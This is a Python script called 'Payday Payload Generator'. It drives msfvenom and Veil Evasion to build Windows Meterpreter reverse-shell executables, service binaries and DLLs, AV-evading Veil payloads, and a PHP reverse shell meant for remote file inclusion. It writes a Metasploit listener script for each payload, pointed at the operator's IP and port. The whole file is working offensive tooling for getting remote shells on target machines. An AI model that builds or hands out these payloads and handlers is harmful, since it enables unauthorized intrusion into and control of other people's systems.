#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author : Matt Lorentzen
# Twitter : @lorentzenman
import os, sys, time, argparse
def banner():
version = "part of the spiderweb"
banner = """
_
_ __ __ _ _ _ __| | __ _ _ _
| '_ \ / _` | | | |/ _` |/ _` | | | |
| |_) | (_| | |_| | (_| | (_| | |_| |
| .__/ \__,_|\__, |\__,_|\__,_|\__, |
|_| |___/ |___/
%s
""" %version
print(greentxt(banner))
def build_tree():
tree_structure = """
The following structure is needed for veil output
payloads
├── veil
│ ├── catapult
│ ├── pillage
│ └── source
└── windows
└── handlers
"""
print(greentxt(tree_structure))
def parse_veil_config():
""" Loads Veil Configuration file options from /etc/veil/settings.py """
# check for veil settings file
if not os.path.isfile('/etc/veil/settings.py'):
print(redtxt("[!] Cannot find the veil settings file. Please check Veil installation or install using setup.sh inside './Veil/setup/setup.sh' folder"))
else:
vf = open('/etc/veil/settings.py', 'r')
for line in vf.readlines():
if not line.startswith('#'):
if "PAYLOAD" in line:
print(line.strip())
print("\n")
vf.close()
# ----- [ Creating Payloads ] ----- #
def msf_payloads(ip, output_dir, payload_port):
# Payloads Dictionary
payloads = []
payloads.append(["windows/meterpreter/reverse_tcp",payload_port, "exe", "revmet.exe"])
payloads.append(["windows/x64/meterpreter/reverse_tcp", payload_port, "exe", "revmet64.exe"])
payloads.append(["windows/meterpreter/reverse_http",payload_port, "exe", "methttp.exe"])
payloads.append(["windows/meterpreter/reverse_https",payload_port, "exe", "methttps.exe"])
payloads.append(["windows/x64/meterpreter/reverse_tcp",payload_port, "exe-service" , "serv64.exe"])
payloads.append(["windows/meterpreter/reverse_tcp",payload_port, "exe-service" ,"serv.exe"])
payloads.append(["windows/meterpreter/reverse_tcp",payload_port, "dll", "revmetdll.dll"])
payloads.append(["windows/x64/meterpreter/reverse_tcp",payload_port, "dll", "revmetdll64.dll"])
payloads.append(["windows/x64/meterpreter/reverse_https", payload_port, "exe", "methttps64.exe"])
#./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe
for parms in payloads:
payload = parms[0]
lport = str(parms[1])
output_type = parms[2]
ext = parms[3]
base = output_dir
venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
print("[!] Generating : " + bluetxt(payload))
print("[>] LHOST " + greentxt(ip) + " on port " + greentxt(lport))
os.system(venom_cmd)
# strip off ext and replace with .rc
print("[!] Generating handler for : " + bluetxt(payload))
handler = ext.split(".")[0] + ".rc"
handler_file = open(base + "handlers/" + handler , "w+")
handler_file.write("use exploit/multi/handler\n")
handler_file.write("set payload " + payload +"\n")
handler_file.write("set LPORT " + str(payload_port) + "\n")
handler_file.write("set LHOST " + ip + "\n")
handler_file.write("set ExitOnSession False\n")
handler_file.write("exploit -j -z\n")
handler_file.close()
print("[!] Generated : " + yellowtxt(handler) + "\n\n")
def veil_payloads(ip, output_dir, move_payloads, veil_path, payload_port):
""" Takes local IP address as LHOST parm and builds Veil payloads"""
# Veil doesn't have a custom output directory option and the default path gets pulled from the config file
# hacky approach :: copy each generated payload and handler in to the custom output directory if it is supplied
# start empty list to hold
os.chdir(veil_path)
payloads = []
# appends payloads with nested 3 value list for dynamic parm calling
payloads.append(["10",payload_port, "v_revhttps"])
payloads.append(["5",payload_port,"v_revhttp"])
payloads.append(["7",payload_port,"v_revmet"])
payloads.append(["6",payload_port, "v_revhttp_srv"])
print("Creating Veil Goodness")
for parms in payloads:
lhost = ip
payload = parms[0]
lport = str(parms[1])
output = parms[2]
command = ("./Veil.py -t Evasion -p " + payload + " -c LHOST=" + lhost + " LPORT=" + lport + " -o " + output + " --ip " + ip)
os.system(command)
time.sleep(2)
# if using a custom output directory, veil doesn't have an option to specify the base directory as it gets this from the conf file
# payload generated above has unique 'base' name - access the list and check the boolean flag that is pushed in
# if this is true, move the file/handler into the custom output directory so that all payloads are in custom location
if move_payloads == True:
# move payload
os.system("mv /root/payloads/windows/" + output + ".exe " + output_dir)
os.system("mv /root/payloads/windows/" + output + ".dll " + output_dir)
# move handler
os.system("mv /root/payloads/windows/handlers/" + output + "_handler.rc " + output_dir + "handlers")
def php_payloads(ip, output_dir, payload_port):
""" Creates PHP based raw shell and outputs as txt ready for RFI """
payloads = []
payloads.append(["php/meterpreter/reverse_tcp", payload_port, "raw" ,"pshell.txt"])
# TODO : push out the payload generation to a dedicated function to remove the code duplication
for parms in payloads:
lhost = ip
payload = parms[0]
lport = str(parms[1])
output_type = parms[2]
ext = parms[3]
base = output_dir
venom_cmd = "msfvenom -p " + payload + " LHOST=" + ip + " LPORT=" + lport + " -f " + output_type + " -o " + base + ext
print("[!] Generating : " + bluetxt(payload))
os.system(venom_cmd)
print("[!] Generating handler for : " + bluetxt(payload))
# strip off ext and replace with .rc
handler = ext.split(".")[0] + ".rc"
handler_file = open(base + "handlers/" + handler , "w+")
handler_file.write("use exploit/multi/handler\n")
handler_file.write("set payload " + payload +"\n")
handler_file.write("set LPORT 443\n")
handler_file.write("set LHOST " + ip + "\n")
handler_file.write("set ExitOnSession False\n")
handler_file.write("exploit -j -z\n")
handler_file.close()
print("[!] Generated : " + yellowtxt(handler) + "\n\n")
# close this file and then move to backup - crazy stuff to get around read/write/edit locks
orig_file = str(base + ext)
backup_file = orig_file + '.bak'
os.rename(orig_file, backup_file)
# now open this file and remove the comments in php so that the file works
holding = open(backup_file, 'r')
new_file = open(orig_file, 'w')
lines = holding.readlines()
for line in lines:
if line.startswith('/*<?php /**/'):
line = line.replace('/*<?php /**/', '<?php')
new_file.write(line)
new_file.close()
holding.close()
os.remove(str(backup_file))
def clean(payload_path, veil_path):
""" Cleans out directory """
# start with default Veil direcory - gets rid of hashes etc
os.system(veil_path + " --clean")
os.system("clear")
print(yellowtxt("[!] Now cleaning default output directory\n"))
# clean out generated payloads in default or custom directory
for file in os.listdir(payload_path):
file = payload_path + file
if os.path.isfile(file):
print("[!] Removing " + bluetxt(file))
os.remove(file)
def get_payload_output(payload_output_dir):
""" Builds directory structure if output option is supplied """
output_dir = payload_output_dir
# check to see if the trailing slash has been added to the path : ie /root/path
if not output_dir.endswith("/"):
output_dir = output_dir + "/"
# creates the structure if it doesn't exist
if not os.path.isdir(output_dir):
print(yellowtxt("[!] Creating output directory structure"))
os.mkdir(output_dir)
os.chdir(output_dir)
os.mkdir('handlers')
return output_dir
###############################
### Helper Function ###
###############################
def redtxt(text2colour):
redstart = "\033[0;31m"
redend = "\033[0m"
return redstart + text2colour + redend
def greentxt(text2colour):
greenstart = "\033[0;32m"
greenend = "\033[0m"
return greenstart + text2colour + greenend
def yellowtxt(text2colour):
yellowstart = "\033[0;33m"
yellowend = "\033[0m"
return yellowstart + text2colour + yellowend
def bluetxt(text2colour):
bluestart = "\033[0;34m"
blueend = "\033[0m"
return bluestart + text2colour + blueend
##############################
## Main Function ###
##############################
def Main():
# program version
version = 1.0
banner()
curdir = os.path.dirname(__file__)
veil_path = os.path.join(curdir, '/Veil/')
#print veil_path
default_path = '/root/payloads/windows'
parser = argparse.ArgumentParser(description="Payday Payload Generator :: Takes the IP Address and then builds meterpreter windows payloads using msfvenom and veil. Outputs to '/root/payloads/windows/' by default.")
parser.add_argument("--veil", action="store_true", help='Veil Payloads')
parser.add_argument("--msf", action="store_true", help='MSF Payloads > tcp/exe, tcp/http(s), exe-service, dll')
parser.add_argument("--php", action="store_true", help='Creates PHP payload as txt file for LFI/RFI')
parser.add_argument("--clean", action="store_true", help="Cleans out existing files in the output directory")
parser.add_argument("--output", help="Specify new output directory.")
parser.add_argument("--ip", help='Specify Local IP Address for reverse connections')
parser.add_argument("--port", help='Specify custom port for payloads. Defaults to 443')
# counts the supplied number of arguments and prints help if they are missing
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
# default variable setup
ip = args.ip
output_dir = ""
move_payloads = False
payload_port = ""
# port option override
if args.port:
payload_port = args.port
else:
payload_port = 443
# set up default path
if args.output:
output = args.output
output_dir = get_payload_output(output)
move_payloads = True
else:
# default directory output :: Veil config points to the this location
output_dir = "/root/payloads/windows/"
# add check to see if this direcory exists and if not, create it
if not os.path.isdir(output_dir):
print(bluetxt("[*] The default path : %s is missing")) %output_dir
print(yellowtxt("[!] You need to create this default path"))
build_tree()
print("The following paths are configured in '/etc/veil/settings.py', these are the default output directories for veil payloads.")
parse_veil_config()
sys.exit(1)
#os.mkdir(output_dir)
#os.chdir(output_dir)
#os.mkdir('handlers')
if args.veil:
if not ip:
print("[!] IP address required with this payload option :: --veil --ip <Address>")
else:
print(yellowtxt("[!] Encoding Veil payloads"))
#TODO remove all the original source files in the source directory
veil_payloads(ip ,output_dir, move_payloads, veil_path, payload_port)
if args.msf:
if not ip:
print("[!] IP address required with this payload option :: --msf --ip <Address>")
else:
print(yellowtxt("[!] Encoding MSF Payloads"))
msf_payloads(ip, output_dir, payload_port)
if args.php:
if not ip:
print("[!] IP address required with this payload option :: --php --ip <Address>")
else:
print(yellowtxt("[!] Encoding PHP Payloads"))
php_payloads(ip, output_dir, payload_port)
if args.clean:
if args.output:
output_dir = get_payload_output(output)
print(redtxt("Cleaning out Payload and Handler File directories in : ") + yellowtxt(output_dir))
clean(output_dir, veil_script)
else:
payload_paths = ["/root/payloads/windows/","/root/payloads/windows/handlers/"]
print(redtxt("Cleaning out Payload and Handler File directories"))
for payload_path in payload_paths:
clean(payload_path, veil_path)
if __name__ == "__main__":
Main()
